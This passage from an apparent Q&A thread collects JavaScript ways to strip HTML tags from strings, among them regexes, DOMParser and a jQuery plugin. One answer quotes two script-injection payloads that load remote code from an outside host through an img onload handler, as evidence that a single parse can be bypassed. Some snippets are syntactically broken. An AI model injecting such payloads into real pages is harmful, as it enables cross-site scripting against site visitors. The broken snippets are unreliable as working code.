if (resultSet[counter].indexOf('&')>=0 && resultSet[counter].indexOf(';')>=0) {
value=value.replace(value.substring(resultSet[counter].indexOf('&'), resultSet[counter].indexOf(';')+1),'')
}
}
if (value)
{
value = value.trim();
if(HTMLParsedText === "")
{
HTMLParsedText = value;
}
else
{
if (value) {
HTMLParsedText = HTMLParsedText + "\n" + value;
}
}
value='';
}
counter= counter+1;
resultSetLength=resultSetLength-1;
}
console.log(HTMLParsedText);

- 11
- 1
This package works really well for stripping HTML: https://www.npmjs.com/package/string-strip-html
It works in both the browser and on the server (e.g. Node.js).

- 54,741
- 40
- 181
- 275
You can strip out all the html tags with the following regex: /<(.|\n)*?>/g
Example:
let str = "<font class=\"ClsName\">int[0]</font><font class=\"StrLit\">()</font>";
console.log(str.replace(/<(.|\n)*?>/g, ''));
Output:
int[0]()

- 103
- 1
- 10
Additionally if you want to strip the html from a string and preserve the break lines, you can use this:
function stripHTML(string)(
let doc = new DOMParser().parseFromString(string, 'text/html');
let textLines = [];
doc.body.childNodes.forEach((childNode) => {
textLines.push(childNode.textContent || '');
})
let result = textLines.join('<br>');
return result;
)

- 1,159
- 11
- 22
To add to the DOMParser solution. Our team found that it was still possible to inject malicious script using the basic solution.
\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'
\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>
We found that it was best to parse it recursively if any tags still exist after the initial parse.
function stripHTML(str) {
const parsedHTML = new DOMParser().parseFromString(str, "text/html");
const text = parsedHTML.body.textContent;
if (/(<([^>]+)>)/gi.test(text)) {
return stripHTML(text);
}
return text || "";
}

- 139
- 7
(function($){
$.html2text = function(html) {
if($('#scratch_pad').length === 0) {
$('<div id="lh_scratch"></div>').appendTo('body');
}
return $('#scratch_pad').html(html).text();
};
})(jQuery);
Define this as a jquery plugin and use it like as follows:
$.html2text(htmlContent);

- 9
- 1
-
Lets say this comes from user input. It can be used to add script or macros to your page – Oluwatumbi Jul 14 '18 at 13:26
function strip_html_tags(str)
{
if ((str===null) || (str===''))
return false;
else
str = str.toString();
return str.replace(/<[^>]*>/g, '');
}

- 642
- 1
- 5
- 9
-
Rolling your own like this is at best a half-solution because this will just nuke the `
` newlines and remove other meaningful information. It removes angle brackets and their interiors from a body of text which leaves you in an inconsistent state. Plus the non angle-bracketed HTML code wouldn't be affected. This is a start I guess, but a function to do this would be at minimum several hundred lines. – Eric Leschinski Jul 05 '18 at 05:30
's between text. And that could concatenate the text together, if there should not be any blank spaces between the
's the preceding text and/or the following text – Jan 30 '13 at 06:41